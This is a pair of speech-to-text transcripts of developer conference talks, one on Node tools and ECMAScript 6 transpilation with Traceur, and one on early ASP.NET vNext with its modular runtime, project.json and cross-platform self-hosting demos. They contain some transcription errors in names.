maybe ten even. We decided it would be interesting if we could work some of the ECMAScript 6 features into the application because there are a few things that I particularly like about ECMAScript 6. The problem is if you write an ECMAScript 6 right now it's not like you can just deliver that JavaScript to a browser like Internet Explorer 10 or even the latest version of Chrome doesn't really support everything. However, there are trans-pallers out there like Tracer which can take ECMAScript source code and rewrite it so it can run in an ECMAScript 5 browser potentially with just a few additional polyfills inside of it. I started exploring Tracer. I'll be honest the verdict is still out a little bit on this. Here are some of the things I would like to do. Let me open up a file. Let me go back to I should have done a push D to that folder and you see Oslo node tools. Here we go. Open up under my source folder. I have a file called employee.js because this uses an ECMAScript 6 class definition. There's really crazy things coming in the next version of JavaScript. JavaScript class that has a constructor so I can use the new keyword and say new employee and pass in a name. This is a default parameter in ECMAScript 6. That's something we could do today by saying something like name equals name or some default value. But it's a little more intention revealing when it looks like this. In fact it looks like C sharp at that point. There's property getters and setters. There is a let keyword. Let does give you true block scoping. If I were to say something like if true let x equals 3 that would live only inside of that block. There's also a const keyword. I can say x is 3 and it always has to be 3. Throw a runtime error if someone tries to write into that variable. This is one of my favorite parts of ECMAScript 6. Kind of on ECMAScript tangent here. The arrow function. Looks familiar if you've done any C sharp. It really behaves the same way. If I want to write a function called square instead of saying let's write a function that takes a parameter x and returns x times x. What they allow you to do is get rid of the function keyword, get rid of these parentheses, get rid of the curly braces, just use the arrow operator or the goes to operator. Don't need a return keyword. Looks just like that. If I wanted something that took two parameters that's when you have to use parentheses and return x plus y. If I want something that doesn't take any parameters, empty parentheses, console.log, hello. Just like C sharp. Just like C sharp. That's something I want to use. The other huge advantage to arrow functions is I have a member out here which is this.name. If you've probably experienced this problem where if you do anything asynchronous like have a set time out call or an HTTP call, if I try to say console.log this. underscore name here, does that work? Probably not because my this context has changed to be something else. It's probably the window object now. I don't get that reference. You guys have run into that or you've seen something like var self equals this to prevent that. With arrow functions, if I use an arrow function here instead of the function keyword, and yes you can still have parentheses in the definition, it can be multiple lines. This keyword lexically binds to the outer function where it's defined. Those two will be equivalent which is kind of nice. Don't have to do as much self equals this type stuff. Anyway, to get this to actually work anywhere requires tracer. If I look at my gulp file, I have a task set up for tracer to take that file and build it into a distribution folder including some experimental features that are inside of it. If I gulp tracer and then look in my distribution folder, that's what it comes out in uses the tracer run time. You have to include that too. Still experimenting with this and trying to figure out if it's something that's really safe for production or not. I do know other project teams that are doing this, like the Angular team, they're actively writing stuff in ECMAScript 6 and using tracer to transpile it into a current version of JavaScript that actually runs in browsers and things like that. I think it's worthwhile for everyone, even if you love Visual Studio and you love C-Sharp and you're doing a little bit of JavaScript, to at least take a look at some of these node tools because I have found they've been very easy to work with. I honestly feel that they have made me more productive and they're good for the products that I am building. Questions? Yes? Can I use these tools together with the MVC web API? Yeah, web API is all server-side stuff. You could certainly, if you're building something that uses that web API with JavaScript and all, certainly use these tools to lint the JavaScript and all that. Yeah, yeah, yeah, sorry, I got that now. I even tried this, but there are grunt and gulp tasks that allow you to execute shell commands. You could certainly shell out to MS build. Thank you. There was another one. Oh, same thing. You just want to replace MS build with yes. I think it would be possible. I know the next version of ASP.net, which is being described over here, relies on the JSON manifest instead of a CS prod file. This might be the direction we're headed in any case. More questions? Well, thank you for coming. I'll hang around here if you do have any questions. If you want to contact me, I think my name's Scott Allen. I'm relatively easy to find. If you just Google for ODECode, you can find a way to get a hold of me. Thanks for coming. Thank you. Thank you. Thank you.
|
Bower, Grunt, Gulp, and Yeoman are tools you can use to help your front-end development regardless of the server side technology stack you use. In this session we’ll see how to use Node and the Node ecosystem to power your development in HTML, JavaScript and CSS, and discuss the strengths and weaknesses of the various tools and processes.
|
10.5446/50867 (DOI)
|
All right. I wasted some time. Cool. Hi. Oh my goodness. Hello. My wife is not impressed with what I do. Just wanted to make the point. What did you do over there? Talked to some people. Mostly editing configs. Okay, cool. So let's do this. Let's do some random and pointless slides that were designed by someone who is good at slides, and then try something that's totally off script because there's no script. I'm Scott. Thank you very much for climbing up there. If somebody yells fire, you're all going to die. I don't want to make sure you're okay. We would never build something like this. Just think about this from an American's perspective. I am suspended. I'm the one you came to see, and they've got me with six ropes, and then you guys are at an angle that is about 30 degrees more than an American would allow. Because we would walk two steps, fall, and then sue the entire place. It's completely unacceptable. I was in Zimbabwe on the Zimbabwe and Zambian border, and we were there looking at the waterfalls. It's this huge waterfall, Victoria's Falls, and there's no fence. There's just some brambles about this tall. I asked the guy, like, what happens if someone falls? He's like, well, they are dead. And I was like, well, I mean, shouldn't someone be upset? Aren't they going to sue you? And he's like, they're dead. Why would you allow this? How is this okay? He's like, don't stand near there. So that's what we're doing with ASP.net. Oh, God, this is so uncomfortable. You really should try this at some point. Okay, I'm Scott. I am one of the lesser Scots. Microsoft has one major Scott, which is a great Scott, Scott Guthrie. And then there's three or four minor Scots. And then Scott Hunter and I are referred to as the lesser Scots, or Scots the lesser. It's like attorney's general. And that is an actual thing. Like, this has become a thing. It was a joke, and now it's an actual thing. And they will ask in meetings, well, you should check with the lesser Scots. And they're referred to as a group. And we're not allowed to have opinions that differ. We have one collective opinion that we have to vote on amongst all of the lesser Scots and then present that idea. So there's great Scott who overrides whatever we think. And then there's our opinion. So I want to talk about what's going on with.net and server. Now there's two talks going on here. There's this talk, and then after this one, if you want, David Fowler and Damien Edwards are going to do an entire hour of Q&A. And not Q&A in the boring way where they answer questions. Q&A in the exciting way like, what if we did this, and then David will code it on stage. He doesn't know that, but I just said it, so now that's... That's now a thing. By the way, you're doing that later. So their talk has no slides. It is just David coding. And then Damien is a program manager, not a coder. So Damien will point over David's shoulder and say, I forgot the semicolon. Damien will also delete email, which is what program managers do. Okay. Blah, blah, blah, animation, blah, blah, blah, marketing, blah, blah, blah, build slide, build slide, build slide, build slide, build slide, blah, blah, blah. Yada, yada, yada, standards, blah, blah, blah, line of business. I mean, I want to respect your time. Let's watch some YouTube videos. I respect your time. All right. We're doing some new stuff in.NET, if you haven't heard. Any people here totally not.NET people and just came for the snacks? You came for the snacks? I know that they did. Okay, good. So it's not your Pappy's Microsoft. We've changed a lot of stuff. We're doing modular releases. We've broken up. We are breaking up.NET a lot smaller than it was before. Before, if you think about.NET, it started shipping, I think, with Windows around, was it NT or Windows? What's the first Windows that shipped.NET? Windows 7? Vista did. Vista shipped.NET. So that was both a good thing and a bad thing. From an adoption perspective, it was like, hey, Windows, other than the fact that it was Vista, here's an operating system and you can be assured that.NET's on it. That's a good thing, or it was a good thing at the time. The bad thing, though, is that.NET doesn't really get updated unless you have this giant installer of hundreds and hundreds of megs and a reboot and then another reboot and then a couple of reboots after that reboot. And then all of that stuff is guaranteed to be there. But then if we update.NET in some way or we change something in the GAC, the Global Assembly Cache, everything in.NET breaks. So you can understand why they did it, but at the same time,.NET kind of needed to be broken up. We couldn't make a change. If you found some horrible bug in.NET that exists in Windows, ships with Windows, it provided us with really no agility at all. We couldn't fix.NET quickly. So the Global Assembly Cache was a problem. The fact that.NET shipped with the operating system was a problem and it basically did not allow us to do be flexible, be open, be agile, innovate, or any of those things. So we're doing the exact opposite. And we're putting as much as we possibly can in the.NET foundation. So basically everything's open source from this point on unless there's a really good reason not to. Is that pretty much it? Damien's nodding. Damien and David are here to make sure if I lie, that we like, no, that's a lie. They will actually speak up. So I will look to them occasionally and I'm like, am I supposed to say that? But the thing is that everything's in the open now, right? Yes, everything is open. That was so sincere. Damien, who is a better program manager than I, was like, yes, everything is open at Microsoft. That was very, very, totally, yeah. Oh, oh, oh. I find your lack of openness disturbing. So in case you hadn't heard, the compiler is in, the.NET foundation. Everything that we're doing with.NET Vnext is on GitHub. It's on GitHub slash ASP.NET. And you can watch the check-ins. This is just an important thing to remind because sometimes there's projects at Microsoft where it's not open source, it's source opened. Which is a look at that, don't touch. It's more of a window shopping. You're not actually allowed to do anything with it. You can really watch them checking stuff in. Fowlers checking stuff in on airplanes all the time, aren't you, Fowler? Pretty much. So everything is going to be modular. Everything's open source with contributions. We're already getting contributions for stuff and it's all going to be cross-platform. And the thing that's really significant about it, though, is this modularity is going to not just be the classes and the things that make ASP.NET and ASP.NET, but it's going to go down to the CLR and the runtime itself. So we're going to try some stuff that might surprise you. Blah, blah, blah. This is really kind of all waste of time. It'll run on Windows and Mac and Linux. Yada, yada, yada. There's really anything here to talk about? Okay, so client apps and web apps are different. Right now, though, they're using the same CLR. The CLR that you're having in Azure is the same CLR that you're running your WPF app on. And those things might have different needs, right? Something that's running on my laptop is going to behave different and you're going to want it to be a different CLR than what's going on in the server. So we're going to kind of make that a little bit different. We have one purpose with store apps and WPF apps and console apps and things like that. Another purpose is going to be server-side apps. So we're going to have specialized CLR on the client side, so you're going to have things like native compilation. You've heard about.NET native. Compiling all the way down to basically, you know, native code using the C++ optimization all the way down. So then you'll be able to bring something down from the store, the Windows store, that is written in C-sharp and it's a native app. And it will run full speed and there's no jitter involved. On the cloud side, though, you're going to want to have side-by-side. And this is really, really important. This is the most interesting innovation, I think, is the idea that I could have a half dozen applications on my server, all different versions, not the different versions of the apps, but different versions of ASP.NET and not just ASP.NET, but different versions of the CLR itself. And I could change one and not break anything. And that's so important when you think about cloud scenarios where you've got a lot of server density. Now, underneath that, though, you're going to have common stuff. You're going to have common NextGenJet. You're going to have the common compiler platform, Roslin. And that Roslin concept is a really important one because you can plug that in right now, actually. You can take Roslin on a, what we call a Dev12 machine. Let's see if we've got something lying around here. This might work. I've got, this is Visual Studio 2013, what they call Dev12 internally. And let's see if this has what I need to see. And I've installed the Roslin preview. So this is not ASP.NET vNext that I'm showing you here. This is me just installing a preview. And if I go here in Tools and go Extensions, la, la, la, la, la, Roslin. So that's just there as an add-on. And I can just disable it. So the compiler has been brought down as what's called a Visix, an extension. And I can turn it on or off. What this allows me to do though, is start using C-sharp 6 stuff in my existing applications. So I say C-sharp 6 features. Here's the Damian who used to work for us, having a list of possible features. This is not final yet, right? They're discussing what they're going to do. So some of the cool things that they're talking about are, for example, here's how you would have a point class before. You've got some privates, you've got a constructor, and then you take the parameters off the constructor, and you stuff them into the private, right? Yay. That is what it would look like in C-sharp 6. So let's say I want to play with that feature now, but I don't want to break anything. I want to do it in a non-threatening way. This is the Visual Studio that you have now. All I have to do is add that Roslin feature as an extension. And then here is the way I did it before, the point class, and I call that pointLame. And then here's point. So here we've got the get like this inside here, and then we're assigning the x, all happening within the constructor. But these are public properties that actually have scope outside this class. Another examples are they're talking about things called method expressions. This is not done yet, but they're talking about doing something like this. If I went and turned this off, extensions, Roslin, disable, restart, start that up again, do-do-do-do. And then go and open that exact same project. Notice how I'm going to get curly braces all over the place. So it's freaking out, because it's like, that's totally not valid C sharp, because it's not. It was a minute ago. So that's one aspect of the modularity. Again, this isn't ASP.NET VNX. It's really important to keep those things separate, but it speaks to this larger movement towards modularity that we're going towards. So if you look at the bottom part there, those run times and compilers and innovations and things like that are going to sit underneath both of these things. So you can have the desktop CLR. You could have that. In this case, I was on.NET 4.5 or 4.5.1, turning Roslin off, turning it on. Didn't have to worry about destroying my machine. Nothing got put into the GAC, and I got to play with the new stuff. We've also got Roslin code DOM providers that allow you to use this in your ASP.NET web forms apps and your razor pages, which is really cool. And it also has a really speed improvements, right? What do you mean? Is it some x? 30x, 60x? In complex x up into the tens of times faster. So that's an order of magnitude? It can be an order of magnitude faster. So that's cool. That is good. That's an order of magnitude, right? Ten is an order of magnitude. Yeah, that's cool. Like a Kroner is an order of magnitude from a dollar. I don't think I'm doing that right. No, okay. Blah, blah, blah. All right, let's see some cool stuff. You don't mind me blah, blah, blahing over all these slides, do you? I'll give you the deck. There's nothing in here. All right. See, I've already got like right there, there was like a red card. Someone actually pulled a red card out from underneath their desk, and they're like, I want to see those slides really bad. Okay, so let's switch over here. Now, this is the Dev 14 CTP. This is the one that you can go and download now. This came out what, two days ago? This is the one that you are absolutely not supposed to install side by side as I have, because it will destroy the world, which it will. You should install this in a virtual machine. I will very likely have to torch this machine later today. Now, this is important though. CTP, this is me talking. CTP means super alpha built on David's computer. They call it community technology preview. It really should call it you have no business installing this. And if setup succeeds, you're a lucky person. But this is, it's either do that or wait a year or two before you get feedback. That's what we're trying to get you guys to understand. Some people don't like this. Some people are like, we just upgraded to 2013. I see this on Twitter all the time. We just upgraded. And now you put out 14. No, we didn't. We put out an early, early build of this thing that is pre-alpha. Like someone just picked a daily and said, that one mostly works. That's pretty much what happened, right? I mean, we're not kidding. And we gave it to you guys so that you can give feedback in the direction that we're going now. So don't freak out. You're not going to see this for a while. Okay. So let's do this. Let me make a new project. And I'm going to go and say new web app. And for now, vNext stuff, and don't worry about names. We'll figure the names out. They'll be dumb no matter what we end up with. They're going to be bad. So these here will end up inside of this one ASP.net world. And you'll say file new one ASP.net. And you'll have a choice about these things. But for now, they're done like this. So I'm going to go and say vNext application. And I'm going to hit OK. And this will chew for a little bit. Blah, blah, blah, blah, blah. Okay. Now, down, okay, there just said package restore in progress. So it's going and talking to the interwebs and bringing down whatever package it needs to. Chew, chew, chew. And we'll notice a couple of things off the bat. If I go to references, we see that that is, what's the word there? It's a kind of hierarchy. Okay. So it doesn't just have system dot whatever, right? So you go, oh, look how simple that is. It's wonderful. Ah! But these are nested dependencies. So this is a little bit more like node, right? So the idea is that there is a class of person who wants to think about things. We support.net four or five. Full stop period. They'll never open that up. And then there's another class of person who is going to say, well, we really, really need this to be different version or whatever, you know. And they're going to want to have full control. I choose to pretend that everything is okay. And other people are going to want to dig in there and figure out exactly what's going on. Now I can go here and right click and say properties. And then where it says active target framework. We don't know what this is going to look like. It may not look like this. Who knows? I can come here and I can pull this down and I can pick the core framework. Remember how we said there was going to be two? There's going to be the server framework and there's going to be the non-server framework, right? Damon, how do you want to say that? The desktop CLR. Yeah. Okay, so let's just make sure we understand. So I said that's the server framework and that's the not one. And he went like that. He said this is the cloud optimized. I said server. You said cloud optimized. And I said not server. And you said that you not server equals desktop. That's today. That's the CLR we know and love. Okay, that's correct. This is important. And that is something new and freaky. Right. You like that. Okay. So old and reliable, new hotness. Is that cool? All right. This is installed at the computer level. You have this now. This can be side by side. Like this has this is many things, but the thing that is most significant about it is it's side by side. And it's going to have things. It's going to it's going to have less than the desktop. You're not going to have system dot drawing. You're not going to have wind forms. This is for the server. There is less stuff in here. Okay. So it does less. So you might go and take your existing application and say, oh gosh, all of my chart rendering code broke. Yeah, because you don't have that now. Or this crazy thing I was doing in web forms doesn't work. Well, system dot web isn't there. So if you're doing straight web API MVC, it'll probably be able to be moved over with changes in name spaces and class changes. But this is breaking. This is important to understand. The desktop CLR is reliable and you can count on it. But now you've got a choice. An example would be that, you know, a line of business application with charts and graphs and a big administration thing. You might do it in web forms or MVC has a lot of dependencies. It'll keep working when we go forward. If you stay on the desktop CLR. But if I'm going to make a tiny little on the metal web API that's going to spit Jason around, that's going to that's a very different environment. Maybe I'm going to want to self host that running at the command line and have it talk Jason or talk XML. Those are very fundamentally different things. So we want ASP net to be able to do low level on the metal and really sophisticated line of business and everything in between. And that's why there's these two options. So let's try this crazy idea. And I don't know if this will work. So lower your expectations now. So let's go to users got desktop. And I don't know what new custom profile even means. That was clearly needed. So I don't know what that was for this will likely not work to. So I want to publish that. And come down here and desktop. This will likely not work to. And something's happening. The circle of patience is happening. There we go. View details. Do some stuff. Do some stuff. I'm seeing scary things happening. This folder is still empty. Things are showing up. Batch files are running. Publishing, publishing, publishing. It's very exciting. We don't know what this demo is, but it's going to be awesome. If it works, I don't even know what he's going to do. I'm captivated. Still going. Site published. So I've just published that. Not with FTP, not with Azure. So what I need now is someone with a Windows 8.1 laptop. Someone who's not him. No, I'm totally serious. Give me one of your laptops. Now. You didn't bring a laptop? That is so respectful as an audience. I would say most Americans would be like, I'm going to shut down my multiplayer Quake server and I will give you. Do you have a laptop? Okay, just throw it up here. It's 8.1. Yeah. He's going to put his credentials in. I also need your credit card. All right, let's see if we can hand it to me without me dying. This is what is this. Ubuntu? What is going on here? This is 8.1. Yeah. Okay. What is this thing? Extra battery. All right. So I'm going to sell that on eBay and I'm going to go and put a USB key with some viruses on it. We're going to go to the desktop here and I'm going to take this will likely not work too. And I'm going to copy it onto my USB key. And I'm going to look at your browser history and just learn a little bit about you and your preferences and things. So this is copying. This is about 80 megs. What you do inside of that is a packages folder. Okay. And the website. And that's copied. And I think that life is too short to safely eject USB keys. So I'm not going to. Live in on the edge. 220 volts. Does it work? Is this your computer? Is this like Dvorak? What's happening? All right. So let's see if I can do this without breaking your computer. All right. Take that thing in there. There we go. You're one of the left side people. Why would you put it on the left? What's wrong with you? This will likely not work too. So I'm double clicking. Is this touchscreen? Ah. And I'm going to go to Chrome. And I just double clicked on web.cmd. And that's that thing over there. And I see the little lights blinking. And I'm going to say local hosts. Oh. Maybe if I make more of those. 8080. 8080. You sure? All right. You sure? 5,000. 5,000? You sure? You're an idiot. Notepad. 5,000. Maybe if I hit enter a few more times. Is it working? What's that? It says started. It's kind of a downer. Fortunately, I called it this will not work too. Funny part is that I never tested it over here. Try again. I'm testing it over here as well. Started. It's Chrome's fault. And it's going to be a terrible thing. I'm going to add blocker. What the hell is going on here? Firefox? Wait a second. This isn't XP? What is this thing here? You have a fake start menu? Start 8? Are we sure this is 8.1? Are you pretty sure? Like it locks up. All right. Thanks for that. Hit enter here a couple more times. I'm going to declare your computer sucks. That sucks. Yeah, I'll give me your computer. You really want to do this like that? All right. I didn't know you went both ways. I don't even know which one of these do I use? Neither of these is going to fit where I need them to fit. I need DVI. I need DVI. Is that a little even? I got it handled. Tiny HDMI to slightly larger HDMI. Tiny HDMI, slightly larger HDMI to even larger DVI. Stack overflow? I knew it was their fault. That's what the error was? Okay. So that's David's fault. He will fix that. He'll be fixing that before the next thing. Hey. This is not touchscreen. No. All right. And you guys' keyboard is special. What's the umlot for? Blocked. Oh, it's not. How do I? There we go. Sorry, guys. I'm going to switch over to this one here called poo. Ah! We've got to do something while I wait for it to compile. That's you as a child, right? I have a picture of myself as a child on my desktop as well. Okay. All right. So the point there, and we'll want to take a look at your laptop and figure out what the hell is going on. I have the wrong defaults. Do you realize the irony in the term wrong defaults? Well, so you see your problem is you're running Windows right off the bat. Let's solve that problem right off the bat. All right. So I had the wrong. Well, actually, let's use this opportunity to look at packages.json. We can talk about that. So rather than just saying, hey, look, the demo worked, let's learn about this, shall we? And can I just get a little respect for this? I just want to make sure everyone's cool on that. Because, yeah, there you go. I'm keeping these, by the way. I did not have these in my collection. Seriously, what the? Here, give those to... Oh, he'll... Snake, it'll bite you. All right. We back up? All right, cool. So let's talk about the larger issue, and you guys try them in. So we've got an app here, and he says it'll never work. Probably won't. But let's talk about what an app is composed of in this new world. So I will run this and see if it will never work. It might not. Wrong version of something, I'm sure. Waiting, waiting, waiting. This is because I've upgraded my machine in different ways and changed some defaults. Yeah, he's like, I don't know. So this is important to point out, of course, how early this stuff is, right? None of this stuff is expected to work. And every time I do something crazy like that, where we publish to a USB key and then run it on another person's machine, that obviously has never had that stuff on it before, those guys are like, hey, that worked. Yeah, so you can see it's not working locally either as well. So these references here come out of this project.json. Project.json is kind of your NuGet packages file and your projects, your CS Proj all combined into one thing. It's a reimagination of these things. And one of the things that they're thinking is not working is that one of these values is wrong. Now, if I wanted to add a reference to something, I can go and say, right click, add reference today, right? And then a miracle happens, and that shows up in XML somewhere. In this world, you're going to be able to go like this and put in quotes, and then immediately I've got IntelliSense within my projects file here, and I can start writing something. And then as soon as I hit colon, you see I've got the choice of whatever the latest version of that is, or I could say, you know, star. And that would just get the latest one. So I could say, zero one alpha star, and that would pick up whatever the latest version is. So this is a lot more like Node. It's kind of like the Node style of doing things. Things are broken up into pieces, and I can pick exactly what I want and exactly the version that I want. Now, if we go over onto the USB key and look at the one that worked, we'll see what happened here. This web.cmd, you can see that we've actually got the x86 core server version 4.46 of the runtime. This is called the K runtime, and I don't know, we'll end up calling it something else maybe. And it goes and runs it and it says, I want you to go and host this application and run the web.cmd. And you notice that it's coming right out of this folder. It's coming out of packages and here. So if I go into packages, your initial reaction might be like, whoa, that's a lot of packages. This looks really complicated and scary. But remember what we talked about before. You can either go and install a multi-hundred meg runtime at the server level and have no control over it, and we might break it if a new version gets updated and every application in your system might get broken. Or you put up with more packages in your packages folder and a larger footprint on the app itself, but then you get absolute control and the guarantee that we can't break your apps. Or your coworker can't break your app. Or IT can't break your app. Just the fact that I was able to take his laptop and run a daily build of a next-gen application on his machine without having to install anything. I want to make sure you understood that demo. I didn't have to put anything on his machine. I'm guaranteed that I'm going to have that same experience when I go and put that up in the cloud. This is also going to enable you to use new stuff without talking to IT. Because you think about that. If you're working on Node or you're working on Rails, you don't have to check with IT before upgrading to a small build, a small version, but if you went from.NET 4.5 to 4.5.1, that probably involved a meeting at your company which IT then said no. And why did they say no? They said no, we don't want you to install 4.5.1 because you're going to break something. You're going to break something on another machine. And that engenders a sense of fear and a lack of trust. So the design of the next version of ASP.NET is meant to completely turn that on its head. And that's why I did crazy stuff like demos on USB keys. You will be able to use this stuff without fear. It will run the same no matter where you run it. And it was interesting when I ran it over there on your machine, I'm thinking, oh, it's clearly your machine. That's a silly thing for me to say, given that I'm selling you this thing right now. Because I ran it on my local machine and it didn't run. Because it runs exactly as it's going to run because it's entirely self-contained. So these packages in here include the compiler itself, the Roslin compiler, a totally different version of the compiler than the one that I showed you earlier. We've got three or four different versions of the compiler here. So imagine that you would be able to potentially fix a bug at the compiler level if you theoretically wanted to because it's open source and you could just have your own version of the compiler, which is pretty cool. It's got the runtime itself. Now you get the server and then the server core. So this is the K runtime for the desktop CLR and then the K runtime for the core CLR living next to each other here. And I can switch between them. And then I've got all the different versions of ASP.NET stuff. These things can be swapped out and changed and upgraded, which is going to give you a lot more flexibility. Now, this is all very early. So you will see reconciliation of these and batched into packages of packages and meta packages. So we don't know if this is the level of granularity that we're going to have things at. But it's going to be a little bit more organized. And you can see that at this level, I only have to think about that top, that first level of dependencies and then the rest of those things come back in. Now, David, what's something I could add that would not harm this application? Oh, it's already broken. So it doesn't really matter what I add, isn't it? That's a good point. Diagnostics. So I'll go and add diagnostic. See, so then you can see that it just made a call out to NuGet and I can go and pick different builds. Or pick star, I've assumed, but I'll just pick some random build. That's a bad idea. And then I'm going to bring up output and pin that. And then I'm going to just hit save. And it immediately sets up the packages and on the right hand side, it's going to update the references right off the bat. And when those show up, and this will get faster right now, it's actually hosted at myGet rather than NuGet.org. So it's hosted at a NuGet as a server company. So if you ever thought about doing a NuGet server of your own in your company, don't set your own up, just go to myGet and pay them and you'll have NuGet as a server for them. So diagnostics will show up where, guys? Fowler? Where would it be? Right there. So that just appeared there. Now, there'll be a gesture where I can right click and say add reference and it'll update the packages.json, but I want to point out the way that you can see those changes occur right off the bat. So just by hitting save, I'm going to refresh all of that. Now, this app is broken. This app is not. Let's run this and make sure. Now, the goal is to get this fast. How fast is the goal? So this is not under a second. So in order of magnitude faster. Right? It's not a joke. And the reason that it is not fast right now, because zero optimization has been done. This is about getting the fundamentals right. Speed comes later, so I'm not too worried about it. And the theory is going to be that it's going to get a lot faster because there's less work going on of a different kind. It's more in-memory work and less messing around on the disk work. So let's do this. I'm going to open up Explorer here, and you can see that it looks like a regular MVC application. Nothing particularly interesting going on. If I go to the bin folder, there's nothing in the bin folder, okay? Except that. That file was added. That was a key file. It's a file that changes the behavior of.NET simply by its existence. That was added in.NET 451. And the idea was to see if that file's there and have an entirely different loader process takeover. But there's no bin folder here. There's no stuff here. Can I delete these? So those are gone. And this application runs just fine. So it saw the change and it has to recompile, correct? And the compilation, though, is happening entirely in memory. That's hella slow, dude. It's my computer. It's this i7. Yeah. I think it may have been, it was time to scan for viruses, probably. So if I go to about... Certainly you know now that you can go and make changes in your views. Those get compiled and you can just hit F5. What you can do now, though, is make changes in code behind. So I can go back in here, make a change in a code behind, hit save, then hit refresh over here. And the entire application will compile and will change. And the goal is to get it down to a second. So it's basically make a change, refresh, make a change, refresh, make a change. That is the intent, okay? So you're going to get the speed of.NET and the memory management, the jitter, and all of those kind of next-gen things. And this is not in any way to disrespect Node or Rails, but their perspective on how they work from a runtime in a virtual machine is completely different from.NET. So if you could have native code speed and execution with a next-gen JIT working across multiple processors and using all the memory on your machine, and have the agility of a type and go, type and go, refresh, refresh, kind of an experience with no compilation, then you kind of get the best of both worlds. It's a much more agile experience. I don't know why these guys are freaking out, but that's actually not a big deal because it's a lie. There you go. That's fine again. Nope, and now it's freaking out. Why is that happening anyway? My machine? Yeah, I'm sure it is. And again, bin folder is not there. Now, back over looking at the project.json, there's this command here called web. I should be able to drop out to the command line into that folder. So let's do this. So here I am, and I can type KVM, not a confusing or a decision of a three-letter acronym at all. No one will ever buy a KVM switch again. And I can say KVM list, and that will tell me which versions of the.NET framework, the.NET core framework that we've got on this machine. So these are different versions of this K runtime. That includes the framework and the CLR itself. You can see I've got old builds and builds that are 40 versions higher, and then I can see which one is active specifically, and I can set aliases. So I've got this one set as default. So right now, 489 is the one Visual Studio is using. I can switch between them as I like. And then if I type K, K web in this particular folder will call this command. So K web is what we were doing when we ran that web.command before. And this is going to self-host this application, and I believe it's on 500. 5,000, sorry. So that is not IIS, right? That's being completely self-hosted. And this is more modular than even I think any of us realize, because you can swap out anything. Like we've got dependency injection built in that's coming with ASP.NET VNX. Don't like it, swap it out. You don't like the way that the middleware pipeline works or the diagnostic stuff works, swap it out. You don't like the Roslin compiler get a different version, swap it out. You don't like the way that we're doing hosting in IIS. You want to host it on Apache instead. We don't care. You want to swap out totally different operating system, knock yourself out. So if I switch over to the Mac. How long does this talk go to? 12 points left. There we go. So here. Sublime. There you are. So here's my Mac and I'm in Sublime. And that's not too small. Okay, so over here we've got some interesting stuff going on. This is a hello world that David gave me. And this sitting in Sublime on a Mac. On the left hand side here, there's a couple things. There's the get location that it came from, right? And there is this global.json that I'll talk about in a little bit. And there's basically a selection of projects. Hello world, hello world MVC, this thing called no-win. If I go into the hello world web, we can see that this is a little hello world application. And it's very low level. It's not bringing in that whole stack of MVC stuff. This is going to be on the metal. And in this case here, it includes just Microsoft, ASPnet, HTTP. And it has more commands than just web. It's got options to use what's called the no-win HTTP server, a little tiny developer server. And another one called Firefly, that is a non-Microsoft entirely written in C-sharp HTTP server. So here on a Mac, I've got three different servers that I can potentially run on. This is just showing the ability that not only have we swapped out to mono, we swapped out to a Mac, we've got three different choices of what HTTP server I might want to run this stuff on. And again, if you want to run it on Apache or whatever, someone will do that for you. So let's go into hello world web. And take a look at what this guy has. So taking a complete juxtaposition from the full stack MVC to a very low level application, it can get as close to the metal as you want to, then where would I run K from it? This folder or somewhere else? This folder here? K web Firefly? Maybe? What port is that going to run on? 3000? And you just, it would be nice if it told me. That would be great. Like, yeah, I get a pull request. There you go. So then if I got rid of, got out of there and said K web, which is a same application hosted in an entirely different host, that'll be on 8080, the app works. So you have the ability to swap out any aspect of this thing. And we're going to have, potentially, the idea is with K, you'll be able to say K-dash-watch. Because that file watcher is the thing that says, oh, it's time to recompile this. So imagine a scenario where you're on a Mac, you're in Sublime or your favorite editor of choice. At the command line, you've run K watch, meaning watch the folder. You're making your changes and then you're hitting refresh. And it's that watcher that says, oh, recycle that and recompile, and you're going to get that nice experience. We're going to build a Sublime plugin. So you're going to have a Sublime package. So Sublime people are going to have a really great experience doing Razer and doing ASP.net on a Mac, and then deploy that off to Azure or whatever. You can go and run KPM and package up that application. So that publish gesture that I made in Visual Studio, and I right clicked and I said publish. That was a KPM pack where it was like, get this guy ready to run anywhere. So I could go and then build on the Mac and deploy anywhere I like. Let's try one more crazy thing. If we're doing crazy demos that won't work, let's go all the way. So switch back over to my PC here. And help me out with this one, David and Damian. And the reason I'm asking them to help me out isn't because I have no idea what I'm doing, but this stuff is changing a lot. Like, they got me up to speed and I was reading the code and then I took a vacation and I came back and like 40 builds had happened. And I was like, this isn't working and this isn't working. And I was like, what build do you want? And I was like, I don't know, 421. Is that cool? Oh, God, 421. We're on 486. Everything has changed. Really everything? So if you get involved now, understand that it is chaos every single day. Stuff is going to break because we're doing this in the open now. This isn't Microsoft hides out for a year and then drops it on you. Like we assume that we know what we're doing. This is everybody's involved, pull requests from the communities, arguments in issues on GitHub. It's all happening right now and things are broken. Now, when things are broken, sometimes you're going to want to be able to change the source. So here's my MVC application and I'll go and run this, right? And let's say that I want to build a MVC and it's broken and it's bugging me. I don't think this is acceptable. What do you do? Like how would you take this app and fix a bug in MVC? That would be chaos to do that today. What I can do with the next version here is I can go add new folder and I'll just call it global. Then I will right click and say add new item and we're going to make a global.json. This is a file that is bigger in scope than project.json. And inside that, if I remember correctly and you can correct me as sources and then have an array. Is it an array like that? Is that right? No? Well, then tell me how. How many of these do I have to have? There's a regular expression, right? Right? There you go. It's a real array. Oh, not a string array. There you go. And then do that. No semicolon? Oh, it's not C sharp. We should talk to Crockford about that. So over here in my GitHub folder earlier today, I cloned MVC. ASP.NET MVC. I just cloned it. I just went up to Git because that's where it is and I cloned it because it's open source. And I go in here and I go and say, GitHub slash slash, I've got to escape my stuff there, MVC. Okay? What? Oh, because it's in source. Now, or is it acceptable to you, David? Such a nice man. All right. So now some crazy stuff's happening. And then I wait. Sub-second. Right, David? What is happening right now? So it's going out and it's looking at some packages in Nougat, and of course they'll make this faster. But watch on the right-hand side. My solution has a project in it right now. It's got one project called Web Application 6 that references MVC. You know I reference MVC because if you look at the projects.json, there I reference MVC. But I also have MVC in a folder and I've just gone into my globals and I've said, hey, I've got this application over here and I want to do stuff. So. When does the magic happen, David? Wait for it. Should I wait longer? Save the start-ups, yes? What we're doing by having to go and save this or save that is to touch these files. And this is all because of various bugs. Is that good? Check what again? Check it again. Cool? So he says check global.json. That look okay? Source says. Oh, the white space. That must be it. Thank you. Clearly there was a white space issue in the json. No. Clearly close it and open it again. Of course. Who's fault is it now? Damien's fault. It's because you're at a conference. You should be working on this stuff. We'll try this one more time. All right. So it's thinking. Something's happening. Look at this. It shows showed up simply because we pointed to that 